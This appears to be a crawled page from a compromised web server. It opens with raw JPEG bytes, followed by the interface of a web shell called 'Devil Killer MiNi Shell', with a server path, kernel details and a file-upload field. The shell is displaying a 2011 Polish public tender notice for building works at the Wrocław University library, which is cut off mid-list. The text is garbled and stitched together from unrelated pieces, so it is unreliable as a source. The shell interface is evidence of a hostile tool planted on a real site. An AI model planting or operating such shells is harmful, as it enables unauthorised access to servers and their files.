JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/341314-N-2011.html

<p class="kh_header"><b>Wrocław: Wykonanie robót budowlano-montażowych w budynku Biblioteki Głównej Uniwersytetu Wrocławskiego</b><br>
<b>Numer ogłoszenia: 341314 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bzp.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlano-montażowych w budynku Biblioteki Głównej Uniwersytetu Wrocławskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlano-montażowe w budynku (będącym w budowie) Biblioteki Głównej Uniwersytetu Wrocławskiego polegające na wykonaniu:
a) systemu oddymiania pasaży w budynku biblioteki głównej uniwersytetu wrocławskiego
b) systemu napowietrzania i różnicowania nadciśnienia dla klatki schodowej s1
c) wzmocnienia otworów przez zastosowanie taśm węglowych wraz z ich obudową materiałem ppoż oraz wykonanie kanałów wentylacji grawitacyjnej w klasie odporności EIS60
d) instalacji sterowania i zasilania rolet
e) dostawy i montażu dodatkowej rozdzielnicy potrzeb własnych RPW w pomieszczeniu rozdzielni niskiego napięcia
f) demontażu i montażu rurociągów wody lodowej na poziomach +19,5, -7,8 i w szachtach S3 I S6
g) udrożnienia kanalizacji podposadzkowej na poz. -7,80 
h) instalacji monitoringu opraw oświetlenia awaryjnego
i) rozdzielnicy RSERW
j) naprawy okien świetlików
k) robót naprawczych na dachu
l) montażu żaluzji przeciwsłonecznych stałych
m) czyszczenia i dezynfekcji kanałów wentylacyjnych
n) modernizacji i naprawy central wentylacyjnych
UWAGA: 
Wykonanie robót będzie się odbywać na obecnie trwającej budowie prowadzonej przez wykonawcę: SKANSKA S.A. z siedzibą w Warszawie.
1.2. Opis przedmiotu zamówienia zawiera załącznik nr 8 do SIWZ
1.3.  Szczegółowy zakres prac zawierają następujące dokumenty:
a)	System oddymiania pasaży w budynku Biblioteki Głównej Uniwersytetu Wrocławskiego - załącznik nr 9 do SIWZ. 
Projekt Budowlany: Trzeci Zamienny Projekt Budowlany autorstwa Rzyski- Studio Architektoniczne Sp. z o.o.. Projekt Architektoniczno Budowlany z czerwca 2009. Część opisowa znajduje się w punkcie 13.17.
Projekt Wykonawczy: Architektura. Faza C. Część rysunkowa to rysunki:
AR.01.0 rew. C- Rzut poziomu -7,80;
AR.02.0 rew. C- Rzut poziomu -3,90;
AR.03.0 rew. C- Rzut poziomu 0,00;
AR.04.0 rew. C- Rzut poziomu +3,90;
AR.05.0 rew. C- Rzut poziomu +7,80;
AR.06.0 rew. C- Rzut poziomu +11,70;
AR.07.0 rew. C- Rzut poziomu +15,60;
AR.08.0 rew. C- Rzut poziomu +19,50;
AR.09.0 rew. C- Rzut dachu;
AP.01.11 rew. B- Przekrój 1-1;
AP.02.22 rew. B- Przekrój 2-2;
AE.01 rew. B- Elewacja, rozwinięcia 1-2, 3-4;
AE.02 rew. B- Elewacja, rozwinięcia 2-3;
AE.03 rew. B- Elewacja, rozwinięcia 4-5;
AE.04 rew. B- Elewacja, rozwinięcia 5-6;
AE.05 rew. B- Elewacja, rozwinięcia 6-7, 7-8, 9-10;
AE.06 rew. B- Elewacja, rozwinięcia 7-3;
AE.08 rew. B- Elewacja, rozwinięcia 12-13;
AE.09 rew. B- Elewacja, rozwinięcia 15-16;
AE.10 rew. B- Elewacja, rozwinięcia 16-17, 17-18;
AE.11 rew. B- Elewacja, rozwinięcia 19-20, 20-1;
AZ.04.OK/1- Zestawienie okien do oddymiania grawitacyjnego;
AD.29.00- Ekrany dymowe wiatrowe dla okien dymowych, dach, osie H4 do K4;
AD.30.00- Ekrany dymowe wiatrowe dla okien dymowych, dach, osie H4 do K4.
Projekt Wykonawczy: Branża mechaniczna. Instalacje wentylacji mechanicznej i klimatyzacji. Projekt wykonawczy zamienny z maja 2010 faza C. Część opisowa znajduje się w punktach 4.7 i 4.8. Część rysunkowa to rysunki:
PWB-IWK-RZU-006P rew. B- Rzut kondygnacji +11,70 cz. B instalacja wentylacji;
PWB-IWK-RRY-006 rew. - - Przekroje kondygnacji +11,70 instalacja wentylacji;
PWB-IWK-RZU-007P rew. A- Rzut kondygnacji +15,60 cz. B instalacja wentylacji;
PWB-IWK-RRY-007 rew. - - Przekroje kondygnacji +15,60 instalacja wentylacji;
PWB-IWK-RZU-009P rew. A- Rzut kondygnacji +19,50 cz. B instalacja wentylacji.
b)System napowietrzania i różnicowania nadciśnienia dla klatki S1 - załącznik nr 10 do SIWZ.
Projekt Budowlany: Trzeci Zamienny Projekt Budowlany autorstwa Rzyski- Studio Architektoniczne Sp. z o.o.. Projekt Architektoniczno Budowlany z czerwca 2009. Część opisowa znajduje się w punkcie 14.1.5.
Projekt Wykonawczy: Branża mechaniczna. Instalacje wentylacji mechanicznej i klimatyzacji. Projekt wykonawczy zamienny z maja 2010 faza C. Część opisowa znajduje się w punktach 4.6. Część rysunkowa to rysunki:
PWB-IWK-RZU-001L rew. B- Rzut kondygnacji -3,90 cz. C instalacja wentylacji;
PWB-IWK-RZU-002L rew. B- Rzut kondygnacji -3,90 cz. B instalacja wentylacji;
PWB-IWK-RZU-003L rew. B- Rzut kondygnacji 0,00 cz. B instalacja wentylacji;
PWB-IWK-RZU-004L rew. B- Rzut kondygnacji +3,90 cz. B instalacja wentylacji;
PWB-IWK-RZU-005L rew. B- Rzut kondygnacji +7,80 cz. B instalacja wentylacji;
PWB-IWK-RZU-006L rew. B- Rzut kondygnacji +11,70 cz. B instalacja wentylacji;
PWB-IWK-RRY-006 rew. - - Przekroje kondygnacji +11,70 instalacja wentylacji;
PWB-IWK-RZU-007L rew. A- Rzut kondygnacji +15,60 cz. B instalacja wentylacji;
PWB-IWK-DET-007 rew. A- Przekroje dla kondygnacji +19,50 kl. schod. S1 i szachtu S3- detal;
PWB-IWK-RZU-009L rew. A- Rzut kondygnacji +19,50 cz. A instalacja wentylacji.
Projekt Wykonawczy: Architektura. Faza C. Część rysunkowa to rysunki:
AD.26.00 rew. - Podkonstrukcja pod obudowę kanału wentylacyjnego klatka schodowa S1;
c)Wzmocnienie otworów przez zastosowanie taśm węglowych wraz z ich obudową materiałem ppoż. oraz wykonanie kanałów wentylacji grawitacyjnej w klasie odporności EIS60 - załącznik nr 11 do SIWZ.
Projekt Budowlany: Trzeci Zamienny Projekt Budowlany autorstwa Rzyski- Studio Architektoniczne Sp. z o.o. Projekt Architektoniczno Budowlany z czerwca 2009. 
Projekt Wykonawczy: Rysunki uzupełniające konstrukcyjne wraz z opisami z kwietnia 2010:
K-1 aneks G- dodatkowe przebicia w płycie stropowej dachu;
K-2 aneks A- powiększenie otworu w pomieszczeniu elektrycznym;
K-3 aneks E- dodatkowe przebicia w ścianach żelbetowych;
K-5 aneks - - dodatkowe przebicia w ścianach żelbetowych;
K-6 aneks E- dodatkowe przebicia w ścianach żelbetowych na poz. -7,80;
K-7 aneks D- dodatkowe przebicia w ścianach żelbetowych i stropie na poz. -3,90;
K-8 aneks C- dodatkowe przebicia w ścianach i podciągach żelbetowych na poz. 0,00;
K-10 aneks B- dodatkowe przebicia w ścianach i płycie stropowej na poz. +3,90;
K-11 aneks B- dodatkowe przebicia w ścianach  i płycie stropowej na poz. +7,80;
K-14 aneks A- dodatkowe przebicia w ścianach i podciągach żelbetowych na poz. +11,70;
K-15 aneks - - dodatkowe przebicia w ścianach  i płycie stropowej na poz. +15,60.
d) Instalacja sterowania i zasilania rolet - załącznik nr 12 do SIWZ.
Projekt Wykonawczy: Branża elektryczna. Instalacje elektryczne wewnętrzne. Projekt wykonawczy zamienny z marca 2010. Część opisowa znajduje się w punkcie 5.15. Część rysunkowa to rysunki:
IE.03.01- Instalacje siły, rzut poziomu 0,00;
IE.04.01- Instalacje siły, rzut poziomu +3,90;
IE.05.01- Instalacje siły, rzut poziomu +7,80;
IE.06.01- Instalacje siły, rzut poziomu +11,70.
e) Dostawa i montaż dodatkowej rozdzielnicy potrzeb własnych RPW w pomieszczeniu rozdzielni niskiego napięcia - załącznik nr 13 do SIWZ.
Projekt Wykonawczy: Branża elektryczna. Instalacje elektryczne. Rozdzielnia 0,4 kV RGNN. Faza C. Projekt wykonawczy zamienny z maja 2010. Część opisowa znajduje się w punkcie 5.5. Część rysunkowa to rysunki:
IE.7.01 rew. A- Rozdzielnica RPW 0,4kV- schemat strukturalny;
IE.7.02 rew. A- Rozdzielnica RPW 0,4kV- schemat sterowania cz. 1;
IE.7.03 rew. A- Rozdzielnica RPW 0,4kV- schemat sterowania cz. 2;
IE.7.04 rew. A- Rozdzielnica RPW 0,4kV- schemat sterowania cz. 3.
f) Demontaż i montaż rurociągów wody lodowej na poz. +19,50, -7,80 i w szachtach S3 i S6 - załącznik nr 14 do SIWZ.
Wszelkie konieczne wytyczne zawarto w Protokole Technicznym Nr 01/M/WL/2010.
g) Instalacja monitoringu opraw oświetlenia awaryjnego - załącznik nr 15 do SIWZ.
Projekt Budowlany: Trzeci Zamienny Projekt Budowlany autorstwa Rzyski- Studio Architektoniczne Sp. z o.o.. Projekt Architektoniczno Budowlany z czerwca 2009. Część opisowa znajduje się w punkcie 15.12.2.
Projekt Wykonawczy: Branża elektryczna. Instalacje elektryczne wewnętrzne. Projekt wykonawczy zamienny z marca 2010. Część opisowa znajduje się w punkcie 5.6. Część rysunkowa to rysunki:
IE.10.01- rew. A- Instalacje monitorowania oświetlenia awaryjnego- schemat ideowy.
h) Rozdzielnica RSERW - załącznik nr 16 do SIWZ.
Projekt Wykonawczy: Branża elektryczna. Instalacje elektryczne. Rozdzielnia 0,4 kV RGNN. Faza C. Projekt wykonawczy zamienny z maja 2010. Część opisowa znajduje się w punkcie 5.5. Część rysunkowa to rysunki:
IE.14.6.2 rew. B- Rozdzielnica RSERW- schemat strukturalny.
i) Naprawa okien świetlików - załącznik nr 17 do SIWZ.
Projekt Wykonawczy: Architektura. Faza C. Część rysunkowa:
AR.08.0 rew. C- Rzut poziomu +19,50.
j) Roboty naprawcze na dachu.
j) Montaż żaluzji stałych - załącznik nr 18 do SIWZ.
Projekt Wykonawczy: Architektura. Faza C. Część rysunkowa:
AR.08.0 rew. C- Rzut poziomu +19,50.
k) Czyszczenie i dezynfekcja kanałów wentylacyjnych - załącznik nr 19 do SIWZ.
Protokół techniczny nr 01/2011
l) Modernizacja i naprawa central wentylacyjnych - załącznik nr 20 do SIWZ.
Załącznik nr IWK-9- Zestawienie zmian podzespołów w zamontowanych centralach;
Protokół techniczny nr 01/M/WK/2009
m) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - Roboty budowlane w zakresie budynków; opracowanie: mgr inż. M. Chociej - załącznik nr 21 do SIWZ.
n) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - Instalacje sanitarne; opracowanie: mgr inż. M. Chociej - załącznik nr 22 do SIWZ.
o) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - Instalacje elektryczne i teleinformatczne; opracowanie: mgr inż. M. Chociej - załącznik nr 23 do SIWZ.
1.4. Szczegółowe warunki i zasady realizacji umowy, w tym szczegółowe obowiązki Wykonawcy, określa wzór umowy stanowiący załącznik nr 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6, 45.21.23.30-8, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 15 000 zł (słownie: piętnaście tysięcy zł).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3.	Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego. Dokument wadialny powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
4.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Uniwersytetu Wrocławskiego: 
Bank Zachodni WBK S.A. IV O/ Wrocław
NR KONTA 12 1090 2503 0000 0001 1257 6100
z dopiskiem: wadium na postępowanie nr BZP.2422.20.2011.BD
Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do upływu składania terminu ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Bankowy dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.
5.	Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do upływu terminu składania ofert.   Kopię należy dołączyć do oferty.
6.	Wadium winno obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli,  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
co najmniej trzy roboty budowlane* o wartości każdej z nich minimum 2500000 zł brutto i każda z nich obejmująca co najmniej roboty budowlano-konstrukcyjne ( w tym roboty montażu lub wymiany okien) i instalacje sanitarne i elektryczne. Co najmniej jedna z wyżej wymienionych robót budowlanych* musi obejmować budowę lub remont instalacji wentylacji o wartości tej budowy lub tego remontu minimum 800000 zł brutto.
*robota budowlana - należy przez to rozumieć budowę, a także prace polegające na przebudowie, montażu, remoncie lub rozbiórce obiektu budowlanego; zgodnie z art. 3 pkt 7 ustawy z dnia 7 lipca 1994 Prawo budowlane, (Dz. U. z 2010 r. nr 243 poz. 1623 j.t.). 
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w sekcji III.4.1).
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia-nie spełnia. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującą osobą posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2006 r. nr 156, poz. 1118 z późn. zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji tej osoby na okres korzystania z niej przy wykonywaniu zamówienia:
a)	kierownik robót budowlanych posiadający uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
b)	kierownik robót sanitarnych posiadający uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
c)	kierownik robót elektrycznych posiadający uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w sekcji III.4.1).
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada  środki finansowe lub zdolność kredytową w wysokości co najmniej 3000000 zł (trzy miliony złotych) lub jej równowartość w walucie*.
*W przypadku złożenia przez Wykonawców dokumentów zawierających dane finansowe w innej walucie niż PLN Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia zamieszczenia ogłoszenia w Biuletynie Zamówień 
Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?.f=/kursy/kursy.htm 
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w sekcji III.4.1).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp. określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

